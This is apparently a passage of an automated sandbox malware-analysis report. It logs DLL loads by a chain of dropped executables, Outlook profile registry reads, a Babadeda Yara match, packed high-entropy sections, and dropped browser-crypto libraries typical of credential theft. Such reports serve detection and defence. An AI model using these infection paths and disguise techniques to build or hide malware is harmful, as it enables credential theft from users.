Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: netutils.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: apphelp.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: winmm.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: wldp.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: propsys.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: profapi.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: edputil.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: urlmon.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: iertutil.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: srvcli.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: netutils.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: sspicli.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: wintypes.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: appresolver.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: slc.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: userenv.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: sppc.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: pcacli.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: mpr.dll
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Docs.lnk.27.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Google Drive.lnk.27.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.27.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.27.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.27.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.27.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2467980836.000000006C5FD000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xipewav:R;.gata:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	Unpacked PE file: 5.2.RoamingCBFCFBFBFB.exe.750000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Unpacked PE file: 8.2.RoamingIJDGCAEBFI.exe.e70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 9.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 10.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 14.2.explorti.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 15.2.explorti.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 19.2.explorti.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;usoriijt:EW;ymfuwjgb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 20.2.axplong.exe.b20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Unpacked PE file: 21.2.48f0ec6733.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xipewav:R;.gata:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Unpacked PE file: 44.2.48f0ec6733.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xipewav:R;.gata:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Unpacked PE file: 21.2.48f0ec6733.exe.400000.0.unpack
Source: C:\Users\user\1000003002\ee7a49fbf0.exe	Unpacked PE file: 24.2.ee7a49fbf0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe	Unpacked PE file: 44.2.48f0ec6733.exe.400000.0.unpack

Yara detected Babadeda

Source: Yara match	File source: 24.0.ee7a49fbf0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.ee7a49fbf0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\1000003002\ee7a49fbf0.exe, type: DROPPED

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_004195E0

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: ee7a49fbf0.exe.19.dr	Static PE information: real checksum: 0x0 should be: 0x1c0e1
Source: explorti.exe.8.dr	Static PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
Source: axplong.exe.5.dr	Static PE information: real checksum: 0x1da2f0 should be: 0x1d017e
Source: random[1].exe0.19.dr	Static PE information: real checksum: 0x0 should be: 0x1c0e1
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: real checksum: 0x1d3ae7 should be: 0x1d959a
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x1da2f0 should be: 0x1d017e
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: real checksum: 0x1da2f0 should be: 0x1d017e
Source: enter[1].exe.0.dr	Static PE information: real checksum: 0x1d3ae7 should be: 0x1d959a

Source: file.exe	Static PE information: section name: .xipewav
Source: file.exe	Static PE information: section name: .gata
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: qzeqbxes
Source: random[1].exe.0.dr	Static PE information: section name: qgghuozc
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: section name:
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: section name: .idata
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: section name:
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: section name: qzeqbxes
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: section name: qgghuozc
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: section name: .taggant
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name: .idata
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name: usoriijt
Source: enter[1].exe.0.dr	Static PE information: section name: ymfuwjgb
Source: enter[1].exe.0.dr	Static PE information: section name: .taggant
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: section name:
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: section name: .idata
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: section name:
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: section name: usoriijt
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: section name: ymfuwjgb
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: section name: .taggant
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: .idata
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: qzeqbxes
Source: axplong.exe.5.dr	Static PE information: section name: qgghuozc
Source: axplong.exe.5.dr	Static PE information: section name: .taggant
Source: explorti.exe.8.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name: .idata
Source: explorti.exe.8.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name: usoriijt
Source: explorti.exe.8.dr	Static PE information: section name: ymfuwjgb
Source: explorti.exe.8.dr	Static PE information: section name: .taggant
Source: random[1].exe.19.dr	Static PE information: section name: .xipewav
Source: random[1].exe.19.dr	Static PE information: section name: .gata
Source: 48f0ec6733.exe.19.dr	Static PE information: section name: .xipewav
Source: 48f0ec6733.exe.19.dr	Static PE information: section name: .gata
Source: random[1].exe0.19.dr	Static PE information: section name: .code
Source: ee7a49fbf0.exe.19.dr	Static PE information: section name: .code

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041A9F5 push ecx; ret		0_2_0041AA08
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BB536 push ecx; ret		0_2_6C5BB549

Source: file.exe	Static PE information: section name: .text entropy: 7.816119789832956
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.978158442993088
Source: random[1].exe.0.dr	Static PE information: section name: qzeqbxes entropy: 7.95245066634278
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: section name: entropy: 7.978158442993088
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: section name: qzeqbxes entropy: 7.95245066634278
Source: enter[1].exe.0.dr	Static PE information: section name: entropy: 7.983026486073879
Source: enter[1].exe.0.dr	Static PE information: section name: usoriijt entropy: 7.952894618410208
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: section name: entropy: 7.983026486073879
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: section name: usoriijt entropy: 7.952894618410208
Source: axplong.exe.5.dr	Static PE information: section name: entropy: 7.978158442993088
Source: axplong.exe.5.dr	Static PE information: section name: qzeqbxes entropy: 7.95245066634278
Source: explorti.exe.8.dr	Static PE information: section name: entropy: 7.983026486073879
Source: explorti.exe.8.dr	Static PE information: section name: usoriijt entropy: 7.952894618410208
Source: random[1].exe.19.dr	Static PE information: section name: .text entropy: 7.816119789832956
Source: 48f0ec6733.exe.19.dr	Static PE information: section name: .text entropy: 7.816119789832956

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
